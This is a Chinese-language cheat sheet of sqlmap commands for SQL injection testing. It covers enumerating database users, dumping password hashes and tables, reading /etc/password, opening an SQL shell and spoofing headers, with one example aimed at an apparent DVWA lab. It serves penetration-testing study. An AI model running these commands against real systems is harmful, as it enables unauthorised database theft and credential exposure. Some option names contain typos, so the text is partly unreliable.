1)判断当前用户是否是dba python sqlmap.py -u "url" --is-dba -v 1 2)--users:列出数据库管理系统用户 python sqlmap.py -u "url" --users -v 0 3)--passwords:数据库用户密码(hash) python sqlmap.py -u "url" --passwords -v 0 python sqlmap.py -u "url" --passwords -U sa -v 0 4)查看用户权限 python sqlmap.py -u "url" --privileges -v 0 python sqlmap.py -u "url" --privileges -U postgres -v 0 5)--dbs可以利用的数据库 python sqlmap.py -u "url" --dbs -v 0 6)--tables列数据库表 python sqlmap.py -u "url" --tables -D "information_scheam" -D:指定数据名称 7)--columns 列出表中的列名 python sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1 -T:指定表名,-D:指定库名 8)--dump列表中指定列的内容 python sqlmap.py -u "url" --dump -T "users" -D "testdb" -C:可以指定字段 指定列的范围为2到4 python sqlmap.py -u "url" --dump -T "users" -D "testdb" --start 2 --stop 4 -v 0 9)--dumap-all列出所有数据库,所有表内容 python sqlmap.py -u "url" --dump-all -v 0 只列出用户自己新建的数据库和表的内容 python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0 10)--file读取文件内容[load_file()函数] python sqlmap.py -u "url" --file /etc/password 11)执行SQL python sqlmap.py -u "url" --sql-shell 12)-p 指定参数 python sqlmap.py -u "url" -v 1 -p "id" -p可以指定多参数-p "cat,id" 13)POST提交 python sqlmap.py -u "url" --method POST --data "id=1" 14)COOKIE提交 python sqlmap.py -u "url" --cookie "id=1" -v 1
还比如
sqlmap.py -u "http://192.168.50.160/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low" --dbs
cookie值可以由TamperData抓取 15)refer欺骗 python sqlmap.py -u "url" --refer "url" -v 3 16)使用自定义user-agent或者user-agents.txt python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3 python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt" 17)使用多线程猜解 python sqlmap.py -u "url" -v 1 --current-user --threads 3 18)指定数据库,绕过SQLMAP的自动检测 python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL" 19)指定操作系统绕过SQLMAP自动检测 python sqlmap.py -u "url" -v 2 --os "Windows" 20)--prefix and --postfix自定义payload python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test" 21)union注入测试 python sqlmap.py -u "url" --union-test -v -1 22)配合order by python sqlmap.py -u "url" --union-test --union-tech orderby -v 1 23)python sqlmap.py -u "url" -v 1 --union-use --banner 24)python sqlmap.py -u "url" -v 5 --union-use --current-user 25)python sqlmap.py -u "url" -v 1 --union-use --dbs
补充,sql出错的时候有各种各样的提示,使用 --string "hehe" 指定提示
一个更加详细的使用sqlmap的教程
http://hackonadime.blogspot.com/2011/07/sqlmap-introduction-sql-injection.html
但是要自己带梯子